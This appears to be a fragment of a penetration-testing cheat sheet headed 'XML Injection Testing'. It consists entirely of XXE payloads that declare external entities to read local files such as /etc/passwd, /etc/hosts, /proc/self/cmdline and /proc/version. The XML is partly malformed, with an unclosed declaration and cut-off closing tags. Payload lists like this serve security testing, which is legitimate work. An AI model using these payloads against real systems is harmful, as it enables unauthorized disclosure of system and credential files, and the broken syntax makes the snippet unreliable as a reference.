XML Injection Testing

<?xml version="1.0" encoding="ISO 8859 1"?>
<!DOCTYPE test [
<!ELEMENT test ANY
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><test>&xxe;</
<!ENTITY xxe SYSTEM "file:///etc/hosts" >]><test>&xxe;</
<!ENTITY xxe SYSTEM "file:///proc/self/cmdline" >]><test>&xxe;</
<!ENTITY xxe SYSTEM "file:///proc/version" >]><test>&xxe;</

Last updated